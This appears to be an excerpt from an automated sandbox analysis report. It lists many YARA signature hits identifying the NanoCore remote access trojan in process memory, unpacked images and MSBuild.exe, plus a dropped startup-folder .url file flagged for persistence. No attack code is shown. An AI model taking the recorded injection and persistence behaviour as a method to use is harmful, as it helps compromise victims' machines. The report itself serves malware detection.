        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: dropped/znytpstdcrwsisx.fr.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.35a3c74.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.35a3c74.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
